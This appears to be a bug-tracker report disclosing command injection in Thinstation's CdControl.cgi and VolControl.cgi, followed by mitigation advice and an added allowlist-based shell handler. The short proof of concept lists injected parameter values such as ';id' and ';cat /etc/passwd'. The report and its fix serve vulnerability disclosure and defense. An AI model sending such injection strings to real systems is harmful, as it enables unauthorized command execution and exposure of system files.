CGI Generic Command Execution #427
You have a recommendation?
- Avoid calling OS commands directly.
The webserver has very limited system privileges. Common attacks like rt'ing the passwd file can be mitigated by locking the password, and only allowing a single auto-login.
Notice to users. Don’t include the www package in your build if your end points might contain sensitive information accessible from an unprivileged user. It’s kind of a No-duh, but now it’s documented.
The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi.
PoC:
/cgi-bin/CdControl.cgi:
action=;id
eject;ifconfig
back;ls -alt
forward;whoami
pause;hostname
/cgi-bin/VolControl.cgi:
OK=;cat /etc/passwd
Please patch asap. Does affect latest version.
For more information read: https://www.owasp.org/index.php/Command_Injection
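An added example of the "avoid calling OS commands directly" recommendation above (not Thinstation's CdControl.cgi or any project code): a shell CGI handler that treats the `action` parameter purely as a lookup key into a fixed allowlist, so a value shaped like the report's `eject;ifconfig` is rejected instead of ever reaching a shell. The parameter name and the four action names come from the report; the programs each action maps to are hypothetical placeholders, and the same pattern applies to VolControl.cgi's `OK` parameter.

```shell
#!/bin/sh
# Added example, not Thinstation's own CdControl.cgi. The request value is
# only ever compared against literal strings, never interpolated into a
# command line, so shell metacharacters in it have no effect.

# Return the raw value of parameter $2 from query string $1 (first match only).
query_param() {
  printf '%s\n' "$1" | tr '&' '\n' | sed -n "s/^$2=//p" | head -n 1
}

# Map an action name to a fixed command. Each case pattern is a literal word
# with no globbing, so "eject;ifconfig" or ";id" matches nothing and falls
# through to the reject branch. The tool names are hypothetical placeholders.
cd_command_for() {
  case "$1" in
    eject)   echo "eject /dev/cdrom" ;;
    back)    echo "cdplayer --prev" ;;
    forward) echo "cdplayer --next" ;;
    pause)   echo "cdplayer --pause" ;;
    *)       return 1 ;;
  esac
}

# Handle one request: print a CGI status line, return 0 if the action was on
# the allowlist and 1 otherwise. A real handler would run the fixed program
# for the matched action directly, never via eval or sh -c on request data.
handle_cd_request() {
  action=$(query_param "$1" action)
  if cmd=$(cd_command_for "$action"); then
    printf 'Status: 200 OK\r\n\r\nwould run: %s\n' "$cmd"
    return 0
  fi
  printf 'Status: 400 Bad Request\r\n\r\nunknown action\n'
  return 1
}

# Stand-alone demo: use the CGI environment's QUERY_STRING if present,
# otherwise a constructed query string of the kind the report shows.
handle_cd_request "${QUERY_STRING:-action=eject}"
```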